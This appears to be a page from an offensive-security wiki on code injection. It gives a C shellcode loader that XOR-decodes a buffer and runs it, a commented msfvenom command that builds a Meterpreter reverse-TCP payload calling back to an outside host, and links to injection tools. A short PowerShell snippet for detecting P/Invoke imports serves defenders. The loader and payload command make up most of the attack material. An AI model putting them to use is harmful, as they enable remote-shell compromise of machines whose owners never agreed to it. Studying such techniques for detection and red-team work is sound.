Code Injection

​https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process​
​https://blog.xpnsec.com/weird-ways-to-execute-dotnet/​
Shellcode as Function
​http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/​
​https://www.fergonez.net/post/shellcode-csharp​
​https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis​
​https://github.com/byt3bl33d3r/OffensiveNim/issues/16​
​https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Linux%20Shellcode%20Loaders/simpleLoader.c​
Linux example. Compile allowing execution on stack:
1
$ gcc -o loader loader.c -z execstack
Copied!
loader.c
1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4
​
5
// msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f c -o met.c --encrypt xor --encrypt-key a
6
unsigned char buf[] = 
7
"\x31\x33...\x33\x37";
8
​
9
int main (int argc, char **argv)
10
{
11
	int bufsize = (int)sizeof(buf);
12
	for (int i = 0; i < bufsize-1; i++) { buf[i] = buf[i] ^ 'a'; }
13
	int (*ret)() = (int(*)())buf;
14
	ret();
15
}
Copied!
Detection
Show P/Invoke imports in a .NET assembly with System.Reflection.Metadata and PowerShell Core (stolen from 1, 2):
1
$assembly = "\path\to\csharp\binary.exe"
2
$stream = [System.IO.File]::OpenRead($assembly)
3
$peReader = [System.Reflection.PortableExecutable.PEReader]::new($stream, [System.Reflection.PortableExecutable.PEStreamOptions]::LeaveOpen -bor [System.Reflection.PortableExecutable.PEStreamOptions]::PrefetchMetadata)
4
$metadataReader = [System.Reflection.Metadata.PEReaderExtensions]::GetMetadataReader($peReader)
5
$assemblyDefinition = $metadataReader.GetAssemblyDefinition()
6
​
7
foreach($typeHandler in $metadataReader.TypeDefinitions) {
8
    $typeDef = $metadataReader.GetTypeDefinition($typeHandler)
9
    foreach($methodHandler in $typeDef.GetMethods()) {
10
        $methodDef = $metadataReader.GetMethodDefinition($methodHandler)
11
​
12
        $import = $methodDef.GetImport()
13
        if ($import.Module.IsNil) {
14
            continue
15
        }
16
​
17
        $dllImportFuncName = $metadataReader.GetString($import.Name)
18
        $dllImportParameters = $import.Attributes.ToString()
19
        $dllImportPath = $metadataReader.GetString($metadataReader.GetModuleReference($import.Module).Name)
20
        Write-Host "$dllImportPath, $dllImportParameters`n$dllImportFuncName`n"
21
    }
22
}
Copied!
Tools
Injector
​https://github.com/0xDivyanshu/Injector​
​https://github.com/jfmaes/SharpZipRunner​
​https://github.com/plackyhacker/Shellcode-Injection-Techniques​

Malware Development

DLL Injectors

Last modified 15h ago

Copy link

Contents

Shellcode as Function

Detection

Tools

Injector